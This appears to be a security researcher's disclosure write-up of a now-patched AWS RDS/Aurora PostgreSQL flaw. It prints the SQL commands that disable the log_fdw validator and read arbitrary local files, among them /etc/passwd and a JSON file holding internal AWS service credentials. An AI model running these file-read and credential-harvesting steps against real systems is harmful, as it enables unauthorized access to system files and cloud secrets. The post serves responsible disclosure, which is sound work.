
AWS RDS Vulnerability Leads to AWS Internal Service Credentials

Gafnit Amiga
Monday, Apr 11th, 2022

TL;DR

Panoptica's Research Team obtained credentials to an internal AWS service by exploiting a local file read vulnerability on the RDS EC2 instance using the log_fdw extension. The internal AWS service was connected to an internal AWS account related to the RDS service.

The vulnerability was reported to the AWS Security team, which promptly applied an initial patch limited to the recent RDS and Aurora PostgreSQL engines, excluding older versions.

Following the patch, the RDS team personally reached out to every customer that had used a vulnerable version in recent months and guided them through the upgrade process to ensure mitigation. The AWS team has since confirmed that the vulnerability has been fixed and that no customers were affected.

You are probably already familiar with Amazon RDS. In a few words, Amazon Relational Database Service (RDS) is a managed database service that supports several different database engines such as MariaDB, MySQL, and the subject of this post: PostgreSQL. AWS also maintains its own database engine, Amazon Aurora, which is compatible with PostgreSQL and MySQL.

Exploration

I created an Amazon RDS database instance using the Amazon Aurora PostgreSQL engine and connected to the database using psql. I began with some basic exploration of the databases and pre-loaded roles.

Amazon RDS database

Note that the “postgres” user is not a real superuser; it is an rds_superuser.

The AWS documentation describes the role as follows: “The rds_superuser role is a predefined Amazon RDS role similar to the PostgreSQL superuser role (customarily named postgres in local instances), but with some restrictions.”
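For example, the difference is visible directly in the role catalog; a minimal sketch (exact role memberships may vary by engine version) should show rolsuper as false while listing rds_superuser among the granted roles:

SELECT r.rolname, r.rolsuper,
       ARRAY(SELECT b.rolname
             FROM pg_auth_members m
             JOIN pg_roles b ON m.roleid = b.oid
             WHERE m.member = r.oid) AS member_of
FROM pg_roles r
WHERE r.rolname = 'postgres';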

Obviously, this rds_superuser cannot run system commands, read local files, or perform any action related to the underlying machine. Otherwise, it would have been too easy.

Below is a screenshot detailing failed actions taken while attempting to use the rds_superuser role.

The rds_superuser role
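For example, superuser-only operations along these lines are rejected (a hypothetical sketch, not necessarily the exact commands from the screenshot):

-- Both require genuine superuser-level access, which RDS withholds
COPY (SELECT 1) TO PROGRAM 'id';
SELECT pg_read_file('/etc/passwd');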

So, I thought about using an untrusted language to create a function that can execute system commands, but I couldn’t load untrusted languages such as plperlu or plpythonu.

Attempting to load plperlu or plpythonu
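The attempts looked roughly like this (a sketch of the kind of statements that get rejected):

CREATE EXTENSION plpythonu;
CREATE EXTENSION plperlu;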

The returned error suggested having a look at the rds.extensions configuration parameter.

The rds.extensions configuration parameter
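For reference, the parameter can be inspected directly from psql; something like the following lists the allowed extensions:

SHOW rds.extensions;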

While many extensions are supported by Amazon RDS for PostgreSQL engines, none of them is an untrusted language. Therefore, I decided to do some further analysis and research on the extensions, hoping to find a lead.

The log_fdw Extension

The log_fdw extension is supported by Amazon RDS for PostgreSQL engines of versions 9.6.2 and higher. This extension enables the user to access the database engine log using a SQL interface and to build foreign tables with the log data neatly split into several columns.

I followed the documentation and created the foreign server and table.

1. Get the log_fdw extension and create the log server as a foreign data wrapper.

CREATE EXTENSION log_fdw;
CREATE SERVER log_server FOREIGN DATA WRAPPER log_fdw;
SELECT * FROM list_postgres_log_files() order by 1;

The log_fdw Extension

2. Select a log file, create a table and read its content.

SELECT create_foreign_table_for_log_file('my_postgres_error_log', 'log_server', 'postgresql.log');

SELECT * FROM my_postgres_error_log;

The log_fdw Extension

The first thing that comes to mind is to attempt a path traversal. The screenshots below show the attempt.

SELECT create_foreign_table_for_log_file('my_postgres_error_log', 'log_server', '../../../../../etc/passwd');

The log_fdw Extension

Upon executing the command, I received the following exception: “Error: The log file path specified was invalid.”
I wondered whether the error was caused by the relative path itself or by some validation function. To check, I tried another relative path that is less likely to be flagged as a malicious pattern.

SELECT create_foreign_table_for_log_file('my_postgres_error_log', 'log_server', './postgresql.log');

The log_fdw Extension

It is clearly a validation function.

Understanding PostgreSQL Foreign Data

PostgreSQL allows access to data that resides outside of PostgreSQL using regular SQL queries. Such data is referred to as foreign data and is accessed with help from a foreign data wrapper. A foreign data wrapper is a library (usually written in C) that can communicate with an external data source, such as a file, and can obtain data from it.

The author of a foreign data wrapper needs to implement two functions:

  1. handler function – triggers the action of fetching the external data
  2. validator function (optional) – responsible for validating options given to the foreign data wrapper, as well as options for the foreign server and foreign tables

Once the functions are created, the user can create a foreign data wrapper.

Understanding PostgreSQL Foreign Data
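In generic terms, and with hypothetical function names, this step looks something like the following:

CREATE FOREIGN DATA WRAPPER my_fdw
    HANDLER my_fdw_handler
    VALIDATOR my_fdw_validator;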

The user also needs to create a foreign server, which defines how to connect to a particular external data source.

Understanding PostgreSQL Foreign Data
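Schematically, again with hypothetical names (the accepted options are defined by the wrapper itself):

CREATE SERVER my_server
    FOREIGN DATA WRAPPER my_fdw
    OPTIONS (host 'example.com', port '5432');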

Then, the user needs to create a foreign table, which defines the structure of the external data.

foreign table
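Schematically, with hypothetical names once more:

CREATE FOREIGN TABLE my_table (id int, payload text)
    SERVER my_server
    OPTIONS (filename '/path/to/data');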

All operations on a foreign data table are handled through its associated foreign data wrapper.

AWS created a custom foreign data wrapper for log_fdw with both a handler function and a validator function.

SELECT * FROM pg_foreign_data_wrapper;

AWS created a custom foreign data wrapper for log_fdw
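The handler and validator function names can also be resolved directly from the catalog, for example:

SELECT fdwname,
       fdwhandler::regproc   AS handler,
       fdwvalidator::regproc AS validator
FROM pg_foreign_data_wrapper;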

Bypassing the log_fdw Extension Validation

Back to the path traversal... The validation can happen in the validator function, the handler function, or both. Since the validator function is optional, it can be dropped without breaking the wrapper's functionality.

ALTER FOREIGN DATA WRAPPER log_fdw NO VALIDATOR;

Bypassing the log_fdw Extension Validation

Now we check to see if the traversal will work …

SELECT create_foreign_table_for_log_file('my_postgres_error_log', 'log_server', '../../../../../etc/passwd');

SELECT * FROM my_postgres_error_log;

my_postgres_error_log

It did!!! There is no validation in the handler function.

As the traversal is not really needed anymore, the table can be created directly:

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename '/etc/passwd');

SELECT * FROM demo;

CREATE FOREIGN TABLE

Discovering AWS Internal Service Access Token

I spent some time going over system files until I found an interesting parameter in the PostgreSQL config file that was not exposed through psql.

The PostgreSQL configuration file is located at “/rdsdbdata/config/postgresql.conf”. Here is the output of the configuration file.

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename '/rdsdbdata/config/postgresql.conf');

SELECT * FROM demo;

Discovering AWS Internal Service Access Token

The screenshot below highlights the interesting parameter “apg_storage_conf_file”, which points to another configuration file named “grover_volume.conf”.

grover_volume.conf

I don’t know what “grover” means, but let’s have a look at the file’s content.

Here is the output from reading the content of “/rdsdbdata/config/grover_volume.conf”.

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename '/rdsdbdata/config/grover_volume.conf');

SELECT * FROM demo;

CREATE FOREIGN TABLE

The file content points to another file at “/tmp/csd-grover-credentials.json”. Let’s have a look at the file’s content (hoping not to be redirected to another file again 😅).

CREATE FOREIGN TABLE demo (t text) SERVER log_server OPTIONS (filename '/tmp/csd-grover-credentials.json');

SELECT * FROM demo;

The contents of /tmp/csd-grover-credentials.json

The file includes temporary credentials of type “CSD_GROVER_API_CREDENTIALS”. The “publicKey” and “privateKey” values look like an STS “AccessKeyId” and “SecretAccessKey”, respectively. The signs that suggest this are the “publicKey” prefix of “ASIA” (as specified in the Unique Identifiers section of the AWS IAM User Guide) and the additional “token” parameter.

This was validated by exporting the Access Key, Secret Access Key, and Session Token to my environment and calling the AWS Security Token Service (STS) GetCallerIdentity API, which returns the User ID, Account ID, and Amazon Resource Name (ARN) of the currently used IAM credentials. From the ARN, we can see that the assumed role name is “csd-grover-role” in AWS’ internal account.

csd-grover-role

By traversing three different files, I was able to discover an internal AWS service and gain access to it. This is where my analysis and research ended; I did not attempt to enumerate any IAM permissions or move further laterally into AWS’ internal environment.

AWS’ internal environment

AWS Mitigation and Investigation

We reported this vulnerability to the AWS Security team, and they released a fix for the latest engine versions within a few days. The AWS Security team also investigated whether this vulnerability had previously been exploited by anyone else and confirmed that it had not.

As for Grover, AWS is not able to disclose details about the internal service.

Timeline

Dec 09, 2021: The vulnerability was reported to AWS Security.

Dec 09, 2021: AWS confirmed the vulnerability and began remediation and investigation.

Dec 14, 2021: AWS deployed the initial patch and noted that they were working on a full fix.

Mar 22, 2022: AWS confirmed that they had reached out to all affected customers and fixed all currently supported versions.

Conclusion

The AWS Cloud is a blessing for many developers, architects, and security professionals around the world due to its pay-as-you-go model and diversity of service offerings. However, as with any service provider, wrapping third-party services such as PostgreSQL and trying to provide users with advanced features is sometimes a double-edged sword.

Update 2022-04-11: Since publishing our post, AWS has released a Security Bulletin related to this finding: https://aws.amazon.com/security/security-bulletins/AWS-2022-004/
